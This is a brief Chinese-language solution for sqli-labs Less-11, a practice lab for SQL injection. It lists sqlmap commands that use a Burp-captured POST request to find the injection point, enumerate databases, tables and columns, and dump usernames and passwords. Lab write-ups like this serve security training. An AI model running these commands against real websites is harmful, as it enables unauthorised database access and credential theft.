使用sqlmap对sqli-less-11 的题解
1.由于该题是post注入,所以我们用bp进行抓包并保存到与sqlmap相同的路径之下。
2.利用sqlmap查询注入点
sqlmap.py -r 123.txt。
3.查询数据库
sqlmap.py -r 123.txt –dbs
4.查看表
sqlmap.py -r 123.txt -D security –tables
5.查看列
sqlmap.py -r 123.txt -D security -T users –columns
6.查看值
sqlmap.py -r 123.txt -D security -T users -C username,password –dump